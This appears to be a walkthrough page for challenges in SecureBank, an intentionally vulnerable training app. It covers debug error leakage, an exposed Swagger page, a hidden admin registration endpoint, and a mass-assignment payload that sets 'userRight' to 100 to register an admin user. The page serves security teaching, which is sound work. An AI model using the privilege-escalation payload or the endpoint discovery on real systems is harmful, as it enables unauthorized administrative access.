Challenges
CWE-756: Missing Custom Error Page
Current configuration of the project is set to debug. In case of a thrown exception, the attacker can see a lot of information, including parts of source code, which they never should be able to.

Swagger
Find SecureBank swagger.
Solution
Go to /swagger
. You will find the flag in the swagger description.
Hidden page
Find a page that was used during development.
Solution
If you look through api/Auth/Register
source code in the browser, you will find a one javascript method is commented out.

You will find the flag if you go to: /Auth/RegisterAdmin
.
Registration with admin role
You need to register a new user with admin role.
Solution
If we look at the response of api/Auth/Login
, we see that it returns the following json.
{
"id": 0,
"userName": "carson.alexander@ssrd.io",
"password": null,
"name": null,
"surname": null,
"userRight": 0,
"cookie": "Y2Fyc29uLmFsZXhhbmRlckBzc3JkLmlv-079f6a2418056497a2651c7d72d787c79d5d7095dedd68e95464ba631de16625-0",
"status": "ok",
"siteAction": null,
"token": null
}
Auth/Register
uses the same model. Next register a new user with userRight
set to a number >50
{
"id": 0,
"userName": "testAdmin@ssrd.io",
"password": "Password1!",
"name": null,
"surname": null,
"userRight": 100,
"cookie": null,
"status": null,
"siteAction": null,
"token": null
}
You will find the flag in the response header.
Last updated
Was this helpful?